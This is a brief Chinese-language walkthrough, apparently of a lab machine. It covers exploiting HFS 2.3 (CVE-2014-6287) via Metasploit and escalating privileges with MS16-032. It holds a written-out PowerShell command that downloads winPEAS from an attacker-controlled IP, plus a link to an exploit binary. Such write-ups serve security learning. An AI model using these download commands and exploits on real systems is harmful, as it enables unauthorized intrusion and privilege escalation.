nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看
打开是HFS,nmap扫出来是HFS2.3
这个版本的HFS是有cve的
https://nvd.nist.gov/vuln/detail/CVE-2014-6287
msf有这个模块
直接拿下shell
拿到user.txt
进不了admin,需要提权
本地起一个python服务,把winpeas传上去
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:8000/winPEASx64.exe', '.\winPEASx64.exe')"
好像没啥信息的
用一下Windows-Exploit-Suggester来测一下没打的补丁
systeminfo拿一下系统的信息
找到很多,这里就拿MS16-032来打吧
找一个payload
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
传上去执行,成功拿到
